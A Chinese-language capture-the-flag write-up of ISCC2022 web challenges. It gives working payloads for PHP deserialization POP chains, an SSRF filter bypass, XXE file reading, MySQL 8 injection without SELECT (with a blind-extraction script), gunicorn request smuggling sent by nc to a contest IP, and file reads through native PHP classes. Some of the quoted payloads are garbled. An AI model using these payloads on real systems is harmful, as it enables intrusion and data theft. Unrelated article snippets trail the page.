    is_numeric(@$info["year"])?die("Sorry~"):NULL;
    if(@$info["year"]){
        ($info["year"]=2022)?$Step1=True:NULL;
    }
    if(is_array(@$info["items"])){
        if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
        $status = array_search("skiing", $info["items"]);
        $status===false?die("Sorry~"):NULL;
        foreach($info["items"] as $key=>$val){
            $val==="skiing"?die("Sorry~"):NULL;
        }
        $Step2=True;
    }
}
if($Step1 && $Step2){
    include "2022flag.php";echo $flag;
}
?> 
//array(0) { }

GET传参 ?Information

要求

'year'2022
'item' 为 三个值的数组 
          且第[1]个的值为数组

payload

/?Information={"year":"2022alex","items":[1,[1],0]}

Pop2022

源码

Happy New Year~ MAKE A WISH
<?php
echo 'Happy New Year~ MAKE A WISH
';
if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }
    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}
class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }
    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/ 

__destruct() //对象被销毁时触发
__isset() //在不可访问的属性上调用isset()或empty()触发
__toString() //把类当作字符串使用时触发
__invoke() //当脚本尝试将对象调用为函数时触发

目的是去构造执行输出flag的操作

Try_Work_Hard类

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

所以最后要把这个类实例化后当作函数来调用 并且赋值

$var='php://filter/read=convert.base64-encode/resource=flag.php';

流程

Road_is_Long:-wakeup.page
$page=new Road_is_Long
$string=new Make_a_Change
$effort=new Try_Work_Hard
$var='php://filter/read=convert.base64-encode/resource=flag.php';

payload


class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){       //
        return $this->string->page;
    }


}

class Try_Work_Hard{
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';

}

class Make_a_Change{
    public $effort;

}
$a=new Road_is_Long();
$a->page=new Road_is_Long();
$a->page->string =new Make_a_Change();
$a->page->string->effort=new Try_Work_Hard();
echo urlencode(serialize($a));
?>

//O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Bs%3A9%3A%22index.php%22%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D

这是一道代码审计题

打开页面

[CTF]-ISCC2022复现_第30张图片

进入 /index 页面 ,抓包

	/index?url=1

[CTF]-ISCC2022复现_第31张图片

进入 ./static/code.txt

解密base100

base100

def geneSign():
    if(control_key==1):
        return render_template("index.html")
    else:
        return "You have not access to this page!"
def check_ssrf(url):
    hostname = urlparse(url).hostname
    try:
        if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
                raise BaseException("url format error")
        if  re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if judge_ip(hostname):
                return True
            return False, "You not get the right clue!"
        else:
            ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
            if is_inner_ipaddress(ip_address):
                return False,"inner ip address attack"
            else:
                return False, "You not get the right clue!"
    except BaseException as e:
        return False, str(e)
    except:
        return False, "unknow error"
def ip2long(ip_addr):
    return struct.unpack("!L", socket.inet_aton(ip_addr))[0]
def is_inner_ipaddress(ip):
    ip = ip2long(ip)
    print(ip)
    return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24
def waf1(ip):
    forbidden_list = [ '.', '0', '1', '2', '7']
    for word in forbidden_list:
        if ip and word:
            if word in ip.lower():
                return True
    return False
def judge_ip(ip):
    if(waf1(ip)):
        return Fasle
    else:
        addr = addr.encode(encoding = "utf-8")
        ipp = base64.encodestring(addr)
        ipp = ipp.strip().lower().decode()
        if(ip==ipp):
            global control_key
            control_key = 1
            return True
        else:
            return Fals

源码大概意思是只有返回为true的时候才可以触发,

那么要想得到true的话需要过judge_ip的else,那么也就是ip==ipp

addr127.0.0.1,将127.0.0.1进行base64编码,然后转小写base64解码ip相同的话就为true

因为它用的base64.encodestring,只会对字符串生效,所以这三步其实是没什么变化的,

ip是我们可控的,所以构造ip=/mti3ljaumc4x

进入

	/index?url=https://@mti3ljaumc4x

[CTF]-ISCC2022复现_第32张图片

替换cookie为:a_cookie = aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==

[CTF]-ISCC2022复现_第33张图片

contentTypexml,是个xxe

function codelogin(){
	var name = $("#name").val();
	var password = $("#password").val();
	if(name == "" || word == ""){
		alert("Please enter the username and password!");
		return;
	}

	var data = "" + name + "" + password + "";
    $.ajax({
    	contentType: "application/xml;charset=utf-8",
        type: "POST",
        url: "codelogin",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    });
}

根据js构造数据包,因为是 xml 数据推测存在 xxe 漏洞,尝试文件读取

需要特别注意的是不像 PHP xxe:这里不需要写协议

DOCTYPE ANY [

]>
<user>
<name>
	&f;
	name>
<password>
password
password>user>

进入

	/mti3ljaumc4x/codelogin

还要切换传参方式为POST

	POST /mti3ljaumc4x/codelogin

[CTF]-ISCC2022复现_第34张图片

Easy-SQL

mysql8无select注入

参考:https://blog.csdn.net/aloneBUThappy/article/details/122047088

爆数据库—security

59.110.159.206:7010/?id=-1 union values row(1,database(),3)--+

Where is the database?
try ?id
security

3

爆表—emails

import requests

fuzz_ascii = list(range(32,34))+list(range(36,38))+list(range(40,60))+list(range(63,92))+list(range(93,127))
a=''
while True:
    b=1
    for i in fuzz_ascii:
        url="http://59.110.159.206:7010/?id=2 and (('def','security','{}','0','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 79,1))#".format(a+chr(i))
        res = requests.get(url)
        print(url)
        if 'Angelina' in res.text:
            continue
        else:
            a+=chr(i-1)
            if(chr(i-1)==' '):
                b=0
            break
    if(b==0):
        print(a)
        break

爆字段—[email protected]

http://59.110.159.206:7010/?id=-1 union table emails limit 7,1

Where is the database?

try ?id
beaxia

[email protected]

Can you find beaxia's email?

访问 /ypHeMPardErE.zip得到源码


include "./config.php";
// error_reporting(0);
// highlight_file(__FILE__);
$conn = mysqli_connect($hostname, $username, $password, $database);
   if ($conn->connect_errno) {
    die("Connection failed: " . $conn->connect_errno);
} 

echo "Where is the database?"."
";

echo "try ?id";

function sqlWaf($s)
{
    $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
    if (preg_match($filter,$s))
        return False;
    return True;
}

if (isset($_GET['id'])) 
{
    $id = $_GET['id'];
    $sql = "select * from users where id=$id";
    $safe = preg_match('/select/is', $id);
    if($safe!==0)
        die("No select!");
    $result = mysqli_query($conn, $sql);
    if ($result) 
    {
        $row = mysqli_fetch_array($result);
        echo "
" . $row['username'] . "

";
        echo "
" . $row['passwd'] . "
";
    }
    else
        die('
Error!');
}

if (isset($_POST['username']) && isset($_POST['passwd'])) 
{

    $username = strval($_POST['username']);
    $passwd = strval($_POST['passwd']);

    if ( !sqlWaf($passwd) )
        die('damn hacker');

    $sql = "SELECT * FROM users WHERE username='${username}' AND passwd= '${passwd}'";
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        $row = $result->fetch_assoc();
        if ( $row['username'] === 'admin' && $row['passwd'] )
        {
            if ($row['passwd'] == $passwd)
            {
                die($flag);
            } else {
                die("username or passwd wrong, are you admin?");
            }
        } else {
            die("wrong user");
        }
    } else {
        die("user not exist or wrong passwd");
    }
}
mysqli_close($conn); 
?>

要求post传参username、passwd

满足

$row['username'] === 'admin' &&
$row['passwd']$row['passwd'] == $passwd

payload

GET:http://59.110.159.206:7010/
?id=-1%20union%20table%20emails%20limit%207,1

POST:username=-1' union values row("1","admin","1")%23&passwd=1

让我康康

gunicorn HTTP请求走私可

参考:https://grenfeldt.dev/2021/04/01/gunicorn-20.0.4-request-smuggling/

服务器发送http请求后,返回服务器gunicorn

[CTF]-ISCC2022复现_第35张图片

后来发现gunicorn 20.0.4有请求走私漏洞,Sec-Websocket-Key: 1会进行特殊解析
构造请求

echo -en "POST / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 76\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxPOST /fl4g HTTP/1.1\r\nHost: localhost\r\nContent-Length: 55\r\n\r\nPOST / HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n" | nc 59.110.159.206 7020

回显提示本地访问

在这里插入图片描述

echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 90\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTTP/1.1\r\nHost: localhost\r\nsecr3t_ip:127.0.0.1\r\nContent-Length: 55\r\n\r\nGET / HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n" | nc 59.110.159.206 7020

在这里插入图片描述

findme

进入/user.php


highlight_file(__FILE__);
class a{
    public $un0;
    public $un1;
    public $un2;
    public $un3;
    public $un4;
    
    public function __destruct(){
        if(!empty($this->un0) && empty($this->un2)){
            $this -> Givemeanew();
            if($this -> un3 === 'unserialize'){
                $this -> yigei();
            }
            else{
                $this -> giao();
            }
        }
    }
    public function Givemeanew(){
        $this -> un4 = new $this->un0($this -> un1);
    }
    public function yigei(){
        echo 'Your output: '.$this->un4;
    }
    
    public function giao(){
        @eval($this->un2);
    }
    
    public function __wakeup(){
        include $this -> un2.'hint.php';
    }
}
$data = $_POST['data'];
unserialize($data);

伪协议拼接读取hint内容



class a{
    public $un0;
    public $un1;
    public $un2='php://filter/read=convert.base64-encode/resource=';
    public $un3;
    public $un4;

}

$a=new a();
echo serialize($a);

//data=O:1:"a":5:{s:3:"un0";N;s:3:"un1";N;s:3:"un2";s:49:"php://filter/read=convert.base64-encode/resource=";s:3:"un3";N;s:3:"un4";N;}

回显base64

PD9waHANCiRhID0gJ2ZsYWflnKjlvZPliY3nm67lvZXkuIvku6XlrZfmr41m5byA5aS055qEdHh05LitLOaXoOazleeIhuegtOWHuuadpSc7

//
//$a = 'flag在当前目录下以字母f开头的txt中,无法爆破出来';

原生类目录遍历



class a{
    public $un0='GlobIterator';
    public $un1="glob://f*.txt";
    public $un2;
    public $un3='unserialize';
    public $un4;

}

$a=new a();
echo serialize($a);

//O:1:"a":5:{s:3:"un0";s:12:"GlobIterator";s:3:"un1";s:13:"glob://f*.txt";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}

回显出文件

$data = $_POST['data'];
unserialize($data); Your output: fA1TE_GRo9rde_OScter5r.txt

原生类SplFileObject读文件



class a{
    public $un0='SplFileObject';
    public $un1="fA1TE_GRo9rde_OScter5r.txt";
    public $un2;
    public $un3='unserialize';
    public $un4;

}

$a=new a();
echo serialize($a);

//O:1:"a":5:{s:3:"un0";s:13:"SplFileObject";s:3:"un1";s:26:"fA1TE_GRo9rde_OScter5r.txt";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}

回显flag

$data = $_POST['data'];
unserialize($data); Your output: ISCC{DQnm19dw_SPxQwQsK_21EnFvN}

爱国敬业好青年-2

主页是假页面

进入 /flag 目录

传参


GET:/flag
POST:langti=39°54N&lati=116°23E

这个经常刷新不出来

总结

比赛质量,比赛难度一年比一年层次提高,真的卷不动了

感谢师傅们看到这里

你可能感兴趣的:(CTF,web安全,安全)

  • 信任 饮冰伊乔
    随着社会的发展,微信和支付宝交易给人们带来了极大的方便,越来越多的人出门都只选择拿一部手机即可,方便安全,可昨天我就遇到了一件比较尴尬的事。昨天傍晚,我从公司出来,感觉有点饿,决定索性吃了饭再回去,来到去过几次的一个店里,如往常一样叫了餐,当时店里吃饭的不多,老板麻利的先去做了,正要扫微信付账的时候发现手机没电了,迷之尴尬,我只好跟老板说不用做了,手机没电了,我身上又没现金,付不了帐了。老板娘很热
  • 为千 佩蓉:为家庭放弃事业的男人没出息吗? 北京朵多教育
    为家庭放弃事业的男人没出息吗我们在搭档的过程中会遇到一些问题,因此要做好心理准备,这样才不会陷入抱怨或双输的局面。关键不是谁比谁能力强,而是夫妻之间如何取长补短。家庭要赢需要每个人的付出和牺牲,大家一起分担和负责,这样才能享受相爱的自由、安全和归属感。我们需要做的牺牲包括自己的时间、自己的一些爱好,甚至事业发展。为千认为做好父亲是非常重要的事,所以他不仅要出席在孩子们的生活中,还要积极地参与和带领
  • yarn的安装和使用全网最详细教程 zxj19880502 yarnnpm
    一、yarn的简介:Yarn是facebook发布的一款取代npm的包管理工具。二、yarn的特点:速度超快。Yarn缓存了每个下载过的包,所以再次使用时无需重复下载。同时利用并行下载以最大化资源利用率,因此安装速度更快。超级安全。在执行代码之前,Yarn会通过算法校验每个安装包的完整性。超级可靠。使用详细、简洁的锁文件格式和明确的安装算法,Yarn能够保证在不同系统上无差异的工作。三、yarn的
  • 请简单介绍一下Shiro框架是什么?Shiro在Java安全领域的主要作用是什么?Shiro主要提供了哪些安全功能? AaronWang94 shirojavajava安全开发语言
    请简单介绍一下Shiro框架是什么?Shiro框架是一个强大且灵活的开源安全框架,为Java应用程序提供了全面的安全解决方案。它主要用于身份验证、授权、加密和会话管理等功能,可以轻松地集成到任何JavaWeb应用程序中,并提供了易于理解和使用的API,使开发人员能够快速实现安全特性。Shiro的核心组件包括Subject、SecurityManager和Realms。Subject代表了当前与应用
  • 网络安全(黑客)——自学2024 小言同学喜欢挖漏洞 web安全安全网络学习网络安全信息安全渗透测试
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • 黑客(网络安全)技术自学30天 一个迷人的黑客 web安全安全网络笔记网络安全信息安全渗透测试
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • 2.5 项目讲解流程 王守谦26 项目资料数据库
    一、项目讲解1、自我介绍2、项目流程-===============================二、自我介绍(一)、学员自我介绍,讲解存在的问题比如:讲解年份、卡顿、重点学历、忘记(二)自我规则内容1、开场白:礼貌用语2、时间:自我介绍1-2分钟以内3、内容:姓名、籍贯、毕业院校、(拉进面试官距离)4、技能:功能测试、接口测试、自动化测试、app测试、性能测试、安全测试黑盒测试、白盒测试、灰盒
  • 物联网边缘网关有哪些优势?-天拓四方 北京天拓四方科技股份有限公司 物联网其他边缘计算
    随着物联网技术的快速发展,越来越多的设备接入网络,数据交互日益频繁,对数据处理和传输的要求也越来越高。在这样的背景下,物联网边缘网关应运而生,以其低延迟、减少带宽消耗、提高数据质量和安全性等优势,为物联网应用提供了强大的支持。物联网边缘网关的应用场景广泛,几乎涵盖了所有需要实时数据处理和传输的领域。在工业场景中,边缘计算网关可以实时处理海量传感器和设备的数据,实现对运行、制造过程的全环节实时监控、
  • Android 系统应用 pk8签名文件转jks或keystore教程 蜗牛、Z AOSPandroidFrameworkandroidaosp系统应用开发
    一、介绍签名文件对于我们在做应用开发中,经常遇到,且签名文件不仅仅是保护应用安全,还会涉及到应用与底层之间的数据共享和API文件等问题。在Android中,签名文件同样也存在这个问题。但是android中又区分系统应用和普通应用。系统应用可以通过android:sharedUserId="android.uid.system"同享系统uid,可以获取更高的权限。所以在做系统应用开发的时候,经常需要
  • 自学黑客(网络安全)技术——2024最新 九九归二 web安全安全学习笔记网络网络安全信息安全
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • 计算机常用端口号 王依硕 linux服务器ssh
    ftp:(20端口)用于ftp服务,用于数据传输。ftp:(21端口)用于文件上传和下载。ssh:(22端口)用于安全Shell访问和文件传输。telnet:(23端口)用于远程命令行计算机管理。smtp:(25端口)用于发送电子邮件。dns:(53端口)用于域名解析。dhcp:(67和68端口)用于动态分配IP地址和配置网络参数。tftp:(69端口)使用udp连接。finger:(79端口)是
  • php 快速入门(六) 王依硕 PHPphp开发语言
    一、前后台交互1.1$_GET用来获取浏览器通过GET方法提交的数据GET方法它是通过把参数数据加在提交表单的action属性所指的URL中,值和表单内每个字段一一对应,然后在URL中可以看到,但是有如下缺点1.安全性不好,在URL中可以看得到2.传送数据量较小,不能大于2KB1.2$_POST用来获取浏览器通过POST方法提交的数据。POST方法它是通过HTTPPOST机制,将表单的各个字段放置
  • react native 总结 一切顺势而行 reactnativereact.jsjavascript
    reactapp.js相当与vueapp.vueimportReactfrom'react';import'./App.css';importReactRoutefrom'./router'import{HashRouterasRouter,Link}from'react-router-dom'classAppextendsReact.Component{constructor(props){su
  • GROM学习 码小白l golang
    什么是GROMGo语言ORM(对象关系映射)库,它提供了一种高效、简洁的方式来操作数据库。通过将数据库表映射为Go语言的结构体,GORM让数据库操作变得更加直观和类型安全。GORM支持主流的数据库系统,包括MySQL、PostgreSQL、SQLite和SQLServer等GORM提供了一系列的API来操作MySQL数据库。以下是一些常用的GORMAPI操作,以及它们在操作MySQL时的用法:安装
  • 山东省大数据局副局长禹金涛一行莅临聚合数据走访调研 聚合数据 API大数据人工智能API
    3月19日,山东省大数据局党组成员、副局长禹金涛莅临聚合数据展开考察调研。山东省大数据局数据应用管理与安全处处长杨峰,副处长都海明参加调研,苏州市大数据局副局长汤晶陪同。聚合数据董事长左磊等人接待来访。调研组一行参观了聚合数据展厅,了解了聚合数据的发展历程、数据产品、应用案例、奖项荣誉等情况。并就企业在数据处理和应用方面取得的成绩进行了深入交流。作为最早一批进入大数据行业的企业,聚合数据深耕行业十
  • 什么软件可以改IP地址 bafnpa123 服务器运维
    什么软件可以改IP地址在现代网络环境中,有时候我们需要更换IP地址来进行网络操作。IP地址是网络通信的基石,它标识了计算机在互联网上的唯一身份。下面,我将向您介绍几种常见的换IP地址的方法:方法一:使用深度ip转换器ip转换器是一种可以在公共网络上建立加密通道的技术。通过ip转换器,您可以更换您的IP地址,从而隐藏您的真实IP,提高网络安全性。在选择ip转换器服务时,请务必选择信誉良好、速度稳定的
  • 网络安全(黑客技术)—自学 德西德西 web安全安全网络安全学习python开发语言php
    1.网络安全是什么网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。2.网络安全市场一、是市场需求量高;二、则是发展相对成熟入门比较容易。3.所需要的技术水平需要掌握的知识点偏多(举例):4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国家安全更有为国效力的正义黑客—红客联盟可见其重视
  • 2024年健康教育、食品安全与社会科学国际会议(ICHEFSSS 2024) GuGu_chen 创业创新
    2024年健康教育、食品安全与社会科学国际会议(ICHEFSSS2024)2024InternationalConferenceonHealthEducation,FoodSafetyandSocialSciences会议简介:食品安全社会科学是一个综合性的研究领域,旨在从社会科学的角度深入探究食品安全问题。它涉及到法学、经济学、管理学、社会学、伦理学、新闻学和国际关系学等多个学科的知识和方法。通
  • 金英沧州焦点解决初64中17,本周第二次、第三次约练,总第440次、第441次分享,坚持分享第187天 守护甜心
    第440次分享青春期顾左右而言他的女生,可以和她聊她的小说,也许是她杜撰的小说,但是可以从中看出她的投射。通过谈论小说中主人公的情感、经历、认知、感受,了解她,走进她的脉络。当了解的足够多了,情绪宣泄的差不多了,可以联系到现实生活中,再聊现实生活,她就不那么防御了,因为她觉得咨询师理解她,她感到安全。一个外表阳光帅气自立的女孩子,内心一片柔情似水,渴望爱情,渴望被呵护,却羞于说出口,当她能说出来,
  • 11 React 组件通信 父传子 a457636876 Reactreact.jsjavascript前端
    在React中实现组件通信是非常常见的需求,其中包括父子组件通信。以下是几种常见的父子组件通信的例子,以及需要注意的知识:Props传递:这是最基本的父子组件通信方式。父组件通过props将数据传递给子组件。//ParentComponent.jsimportReactfrom'react';importChildComponentfrom'./ChildComponent';functionPa
  • 分布式应用下登录检验解决方案 敲键盘的小夜猫 分布式java
    优缺点JWT是一个开放标准,它定义了一种用于简洁,自包含的用于通信双方之间以JSON对象的形式安全传递信息的方法。可以使用HMAC算法或者是RSA的公钥密钥对进行签名。说白了就是通过一定规范来生成token,然后可以通过解密算法逆向解密token,这样就可以获取用户信息。生产的token可以包含基本信息,比如id、用户昵称、头像等信息,避免再次查库,可以存储在客户端,不占用服务端的内存资源,在前后
  • 麦吉丽贵妇膏代理多少钱 麦吉丽小芹
    麦吉丽、麦吉丽贵妇膏、麦吉丽代理、麦吉丽素颜三部曲、贵妇膏详细咨询请添加V信:18688885511国内首个拥有完善代理商管理以及培训系统。旗下四十几款产品,涵盖护肤、彩妆、身体护理、问题肌肤修复护理等方面,其中【素颜三部曲】更是因为被人口碑称赞而迅速蹿红朋友圈及各大微博头条!麦吉丽因其天然、安全有效、高品质立足中国高端护肤品市场,线下专柜体验店遍地开花。大半个娱乐圈明星都在用的护肤佳品。麦吉丽贵
  • Java学习笔记:atomic的实现原理? 曲钟人散
    在多线程的场景中,我们需要保证数据安全,就会考虑同步的方案,通常会使用synchronized或者lock来处理,使用了synchronized意味着内核态的一次切换。这是一个很重的操作。有没有一种方式,可以比较便利的实现一些简单的数据同步,比如计数器等等。concurrent包下的atomic提供我们这么一种轻量级的数据同步的选择。classMyThreadimplementsRunnable{
  • 安全点安全区的通俗理解 来自宇宙的曹先生 JVM垃圾回收GC
    想象一下,JVM(Java虚拟机)是一个忙碌的工厂,而Java程序中的线程就像是工厂里的工人。在这个工厂中,有时需要进行一些大规模的清理工作,比如垃圾回收,来确保工厂运行得更加高效。但是,如果在清理过程中所有的工人都继续他们的工作,可能会引发一些问题,比如有些工人可能正在使用一些即将被清理的资源。为了避免这类问题,JVM引入了“安全点(Safepoint)”和“安全区(SafeRegion)”的概
  • 网络安全(黑客技术)—2024自学 德西德西 开发语言php安全web安全网络安全python网络
    1.网络安全是什么网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。2.网络安全市场一、是市场需求量高;二、则是发展相对成熟入门比较容易。3.所需要的技术水平需要掌握的知识点偏多(举例):4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国家安全更有为国效力的正义黑客—红客联盟可见其重视
  • 京东优惠券,京东内部优惠券免费领取?探秘优惠券背后的真相 高省爱氧惠
    随着网络购物的日益普及,电商平台上的各种优惠券也成了消费者们竞相追逐的焦点。其中,京东作为国内电商领域的佼佼者,其优惠券的发放和领取更是备受关注。特别是在网络上流传着“京东内部优惠券免费领取”的消息,更是让不少消费者心动不已。那么,这些优惠券真的存在吗?我们又该如何正确、安全地领取和使用它们呢?首先,我们需要明确的是,京东优惠券确实存在,并且种类繁多。这些优惠券包括满减券、折扣券、免邮券等多种形式
  • 网络安全(黑客)—2024自学笔记 羊村最强沸羊羊 web安全笔记安全网络安全网络python开发语言
    前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你
  • Nagios安装部署全攻略 weixin_34109408 memcachedphp操作系统
    概述:公司的生产机器一共有12台,2台LVS(主备)、2台nginx、2台tomcat、1台后台服务器(nginx_tomcat)、3台mysql(主+备+异地灾备)、1台图片服务器、2台memcached.可以看出网站的架构就是基于高可用的原理的,每个层面都做了主备、系统的PV不高,对于并发布,高性能没有那么苛求,对于系统安全、稳定有较高要求,前期已经对系统做了各种日志分析,WAF配置,漏洞扫面
  • 苑九芬1601:内在小孩 苑九芬家庭教育心理咨询
    内在小孩是什么?内在小孩是一个人内在最纯然最本真的样子,他的状态取决于我们小时候的经历。如果童年时没有被好好对待,那内在小孩就会匮乏、缺爱、自卑,只有童年时有被好好爱过的人,才会有一个健康快乐的内在小孩,与之相对的,就是满满的安全感、自信和踏实感。绝大多数人都不知道自己内在小孩的存在,更不会去疗愈、照顾自己的内在小孩,于是,这个被忽视的孩子就会是不是跳出来提醒你:我想要爱,想要关注,想要安慰。所有
  • 315晚会刚过,币圈还需自我净化 区块琪迹
    昨天315晚会,相信币圈至少贡献了一半的收视率。然而,整个315晚会一个跟币圈、一个跟区块链相关的案例都没提。很多危机项目方长舒一口气,暂时安全了;套牢韭菜长叹一口气,暂时还得继续维权了。前几年的市场大跌,国内其实并没有看过这么多经典剧情,最多是矿池交易所跑个路,也没大规模维权,因为参与人数有限,一般损失量不大,大家也都不Care。但今年不同了,项目方参与进来,产业链条变得越来越长,环节变得越来越
  • SAX解析xml文件 小猪猪08 xml
    1.创建SAXParserFactory实例 2.通过SAXParserFactory对象获取SAXParser实例 3.创建一个类SAXParserHander继续DefaultHandler,并且实例化这个类 4.SAXParser实例的parse来获取文件     public static void main(String[] args) { //
  • 为什么mysql里的ibdata1文件不断的增长? brotherlamp linuxlinux运维linux资料linux视频linux运维自学
    我们在 Percona 支持栏目经常收到关于 MySQL 的 ibdata1 文件的这个问题。 当监控服务器发送一个关于 MySQL 服务器存储的报警时,恐慌就开始了 —— 就是说磁盘快要满了。 一番调查后你意识到大多数地盘空间被 InnoDB 的共享表空间 ibdata1 使用。而你已经启用了 innodbfileper_table,所以问题是: ibdata1存了什么? 当你启用了 i
  • Quartz-quartz.properties配置 eksliang quartz
    其实Quartz JAR文件的org.quartz包下就包含了一个quartz.properties属性配置文件并提供了默认设置。如果需要调整默认配置,可以在类路径下建立一个新的quartz.properties,它将自动被Quartz加载并覆盖默认的设置。   下面是这些默认值的解释 #-----集群的配置 org.quartz.scheduler.instanceName =
  • informatica session的使用 18289753290 workflowsessionlogInformatica
    如果希望workflow存储最近20次的log,在session里的Config  Object设置,log  options做配置,save  session log :sessions  run  ;savesessio log for  these runs:20 session下面的source 里面有个tracing 
  • Scrapy抓取网页时出现CRC check failed 0x471e6e9a != 0x7c07b839L的错误 酷的飞上天空 scrapy
    Scrapy版本0.14.4 出现问题现象: ERROR: Error downloading <GET http://xxxxx  CRC check failed   解决方法   1.设置网络请求时的header中的属性'Accept-Encoding': '*;q=0'   明确表示不支持任何形式的压缩格式,避免程序的解压
  • java Swing小集锦 永夜-极光 java swing
    1.关闭窗体弹出确认对话框   1.1   this.setDefaultCloseOperation (JFrame.DO_NOTHING_ON_CLOSE);   1.2   this.addWindowListener ( new WindowAdapter () { public void windo
  • 强制删除.svn文件夹 随便小屋 java
              在windows上,从别处复制的项目中可能带有.svn文件夹,手动删除太麻烦,并且每个文件夹下都有。所以写了个程序进行删除。因为.svn文件夹在windows上是只读的,所以用File中的delete()和deleteOnExist()方法都不能将其删除,所以只能采用windows命令方式进行删除
  • GET和POST有什么区别?及为什么网上的多数答案都是错的。 aijuans get post
        如果有人问你,GET和POST,有什么区别?你会如何回答? 我的经历      前几天有人问我这个问题。我说GET是用于获取数据的,POST,一般用于将数据发给服务器之用。     这个答案好像并不是他想要的。于是他继续追问有没有别的区别?我说这就是个名字而已,如果服务器支持,他完全可以把G
  • 谈谈新浪微博背后的那些算法 aoyouzi 谈谈新浪微博背后的那些算法
